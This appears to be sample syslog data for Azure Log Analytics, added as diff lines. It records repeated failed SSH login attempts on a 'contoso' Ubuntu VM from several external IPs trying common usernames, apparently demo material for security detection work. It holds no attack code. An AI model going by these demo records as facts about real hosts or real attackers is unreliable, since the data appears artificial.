+652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:04,UbuntuDevEnv,2019-06-26 17:58:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:04,UbuntuDevEnv,2019-06-26 17:58:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:06,UbuntuDevEnv,2019-06-26 17:58:05,auth,UbuntuDevEnv,info,Failed password for invalid user maxwell from 58.87.109.107 port 45538 ssh2,56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,58.87.109.1,45538,,
+655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:06,UbuntuDevEnv,2019-06-26 17:58:05,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 45538:11: Bye Bye [preauth],56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,45538,,
+656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:06,UbuntuDevEnv,2019-06-26 17:58:05,auth,UbuntuDevEnv,info,Disconnected from invalid user maxwell 58.87.109.107 port 45538 [preauth],56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,58.87.109.1,45538,,
+657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:44,UbuntuDevEnv,2019-06-26 17:58:44,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 35550 [preauth],57058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,35550,,
+658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:52,UbuntuDevEnv,2019-06-26 17:58:51,auth,UbuntuDevEnv,info,Invalid user weblogic from 107.175.127.237 port 36490,57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,107.175.127.2,36490,,
+659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:52,UbuntuDevEnv,2019-06-26 17:58:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:52,UbuntuDevEnv,2019-06-26 17:58:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:54,UbuntuDevEnv,2019-06-26 17:58:54,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 107.175.127.237 port 36490 ssh2,57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,107.175.127.2,36490,,
+662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:55,UbuntuDevEnv,2019-06-26 17:58:54,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 36490:11: Bye Bye [preauth],57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,36490,,
+663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:55,UbuntuDevEnv,2019-06-26 17:58:54,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 107.175.127.237 port 36490 [preauth],57085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,107.175.127.2,36490,,
+664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:57,UbuntuDevEnv,2019-06-26 17:58:57,auth,UbuntuDevEnv,info,Invalid user ubuntu from 54.37.66.73 port 52646,57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,54.37.66.7,52646,,
+665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:57,UbuntuDevEnv,2019-06-26 17:58:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:57,UbuntuDevEnv,2019-06-26 17:58:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:00,UbuntuDevEnv,2019-06-26 17:58:59,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 54.37.66.73 port 52646 ssh2,57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,54.37.66.7,52646,,
+668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:00,UbuntuDevEnv,2019-06-26 17:58:59,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 52646:11: Bye Bye [preauth],57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,52646,,
+669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:00,UbuntuDevEnv,2019-06-26 17:58:59,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 54.37.66.73 port 52646 [preauth],57105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,54.37.66.7,52646,,
+670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:32,UbuntuDevEnv,2019-06-26 17:59:32,auth,UbuntuDevEnv,info,Invalid user gun from 58.87.109.107 port 61152,57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gun,58.87.109.1,61152,,
+671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:32,UbuntuDevEnv,2019-06-26 17:59:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:32,UbuntuDevEnv,2019-06-26 17:59:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:34,UbuntuDevEnv,2019-06-26 17:59:34,auth,UbuntuDevEnv,info,Failed password for invalid user gun from 58.87.109.107 port 61152 ssh2,57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gun,58.87.109.1,61152,,
+674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:36,UbuntuDevEnv,2019-06-26 17:59:35,auth,UbuntuDevEnv,info,Disconnected from invalid user gun 58.87.109.107 port 61152 [preauth],57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gun,58.87.109.1,61152,,
+675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:36,UbuntuDevEnv,2019-06-26 17:59:35,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 61152:11: Bye Bye [preauth],57217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,61152,,
+676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:37,UbuntuDevEnv,2019-06-26 17:59:36,auth,UbuntuDevEnv,info,Invalid user admin from 157.230.190.1 port 47550,57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,47550,,
+677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:37,UbuntuDevEnv,2019-06-26 17:59:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:37,UbuntuDevEnv,2019-06-26 17:59:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:38,UbuntuDevEnv,2019-06-26 17:59:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 157.230.190.1 port 47550 ssh2,57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,47550,,
+680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:38,UbuntuDevEnv,2019-06-26 17:59:38,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 157.230.190.1 port 47550 [preauth],57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,47550,,
+681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:59:38,UbuntuDevEnv,2019-06-26 17:59:38,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 47550:11: Bye Bye [preauth],57251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,47550,,
+682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:01,UbuntuDevEnv,2019-06-26 18:00:01,auth,UbuntuDevEnv,info,Invalid user calenda from 80.108.220.67 port 34402,57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calenda,80.108.220.6,34402,,
+683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:01,UbuntuDevEnv,2019-06-26 18:00:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:01,UbuntuDevEnv,2019-06-26 18:00:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:03,UbuntuDevEnv,2019-06-26 18:00:03,auth,UbuntuDevEnv,info,Failed password for invalid user calenda from 80.108.220.67 port 34402 ssh2,57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calenda,80.108.220.6,34402,,
+686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:03,UbuntuDevEnv,2019-06-26 18:00:03,auth,UbuntuDevEnv,info,Disconnected from invalid user calenda 80.108.220.67 port 34402 [preauth],57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calenda,80.108.220.6,34402,,
+687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:03,UbuntuDevEnv,2019-06-26 18:00:03,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 34402:11: Bye Bye [preauth],57316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,34402,,
+688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:27,UbuntuDevEnv,2019-06-26 18:00:26,auth,UbuntuDevEnv,info,Invalid user testuser from 54.37.66.73 port 33028,57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,54.37.66.7,33028,,
+689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:27,UbuntuDevEnv,2019-06-26 18:00:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:27,UbuntuDevEnv,2019-06-26 18:00:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:29,UbuntuDevEnv,2019-06-26 18:00:28,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 54.37.66.73 port 33028 ssh2,57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,54.37.66.7,33028,,
+692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:29,UbuntuDevEnv,2019-06-26 18:00:28,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 33028:11: Bye Bye [preauth],57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,33028,,
+693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:00:29,UbuntuDevEnv,2019-06-26 18:00:28,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 54.37.66.73 port 33028 [preauth],57458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,54.37.66.7,33028,,
+694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:05,UbuntuDevEnv,2019-06-26 18:01:04,auth,UbuntuDevEnv,info,Invalid user user3 from 107.175.127.237 port 53674,57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user3,107.175.127.2,53674,,
+695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:05,UbuntuDevEnv,2019-06-26 18:01:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:05,UbuntuDevEnv,2019-06-26 18:01:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,auth,UbuntuDevEnv,info,Failed password for invalid user user3 from 107.175.127.237 port 53674 ssh2,57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user3,107.175.127.2,53674,,
+698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,auth,UbuntuDevEnv,info,Invalid user konrad from 58.87.109.107 port 13151,57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,konrad,58.87.109.1,13151,,
+699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 53674:11: Bye Bye [preauth],57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,53674,,
+702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:06,UbuntuDevEnv,2019-06-26 18:01:06,auth,UbuntuDevEnv,info,Disconnected from invalid user user3 107.175.127.237 port 53674 [preauth],57648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user3,107.175.127.2,53674,,
+703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:08,UbuntuDevEnv,2019-06-26 18:01:08,auth,UbuntuDevEnv,info,Failed password for invalid user konrad from 58.87.109.107 port 13151 ssh2,57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,konrad,58.87.109.1,13151,,
+704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:09,UbuntuDevEnv,2019-06-26 18:01:08,auth,UbuntuDevEnv,info,Disconnected from invalid user konrad 58.87.109.107 port 13151 [preauth],57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,konrad,58.87.109.1,13151,,
+705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:09,UbuntuDevEnv,2019-06-26 18:01:08,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 13151:11: Bye Bye [preauth],57655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,13151,,
+706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:16,UbuntuDevEnv,2019-06-26 18:01:16,auth,UbuntuDevEnv,info,Invalid user images from 157.230.190.1 port 35884,57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,images,157.230.190.1,35884,,
+707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:16,UbuntuDevEnv,2019-06-26 18:01:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:16,UbuntuDevEnv,2019-06-26 18:01:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:18,UbuntuDevEnv,2019-06-26 18:01:18,auth,UbuntuDevEnv,info,Failed password for invalid user images from 157.230.190.1 port 35884 ssh2,57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,images,157.230.190.1,35884,,
+710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:18,UbuntuDevEnv,2019-06-26 18:01:18,auth,UbuntuDevEnv,info,Disconnected from invalid user images 157.230.190.1 port 35884 [preauth],57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,images,157.230.190.1,35884,,
+711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:18,UbuntuDevEnv,2019-06-26 18:01:18,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 35884:11: Bye Bye [preauth],57687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,35884,,
